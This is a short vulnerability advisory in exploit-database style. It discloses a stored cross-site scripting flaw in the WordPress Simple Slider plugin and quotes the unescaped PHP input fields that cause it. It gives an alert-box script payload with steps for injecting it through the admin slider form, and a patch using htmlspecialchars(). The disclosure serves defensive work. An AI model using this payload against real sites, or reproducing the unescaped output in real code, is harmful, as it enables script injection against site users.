###################### # Exploit Title : Wordpress WP Slider Plugin Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/simple-slider-ssp/ # Date: 2015-08-18 # Tested On : Windows - Firefox # Software Link : https://downloads.wordpress.org/plugin/simple-slider-ssp.1.4.zip # Version : 1.4.1 ###################### # Vulnerable File : views/options_meta_box.php (Edit and Add Silder) ###################### # Vulnerable Codes : 108:<input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo $slider_options['height'] ?>" /> 142:<input type="text" style='width: 80%' name="slider_options[width]" value="<?php echo $slider_options['width'] ?>" /> 192:<input type="text" style="width: 80%" name="slider_options[cycle_speed]" value="<?php echo $slider_options['cycle_speed']; ?>" /> <?php _e( 'Seconds', 'ssp' ); ?> 211:<input type="text" style="width: 80%" name="slider_options[animation_speed]" value="<?php echo $slider_options['animation_speed']; ?>" /> <?php _e( 'Seconds', 'ssp' ); ?> ###################### # Exploit : For test Cross site scripting can use this code in all of the above inputs. "><script>alert(/xss/)</script>< 1- http://localhost/pentest/wordpress/wp-admin/edit.php?post_type=ssp_slider (add new) 2- Complete Height , Width , Cycle speed and Animation speed forms with above code. 3- Click on create slider 4- Boom (xss alerts) :) ###################### # Patch: To fix this vulnerability you use htmlspecialchars() function . <input type="text" style='width: 80%' name="slider_options[height]" value="<?php echo htmlspecialchars($slider_options['height']) ?>" /> And other lines, too. ###################### # Discovered By : Ehsan Hosseini. # Spc Tnx : H_SQLI.EMpiRe , Channel , Amir-Mahmod and All Ashiyane Members. ######################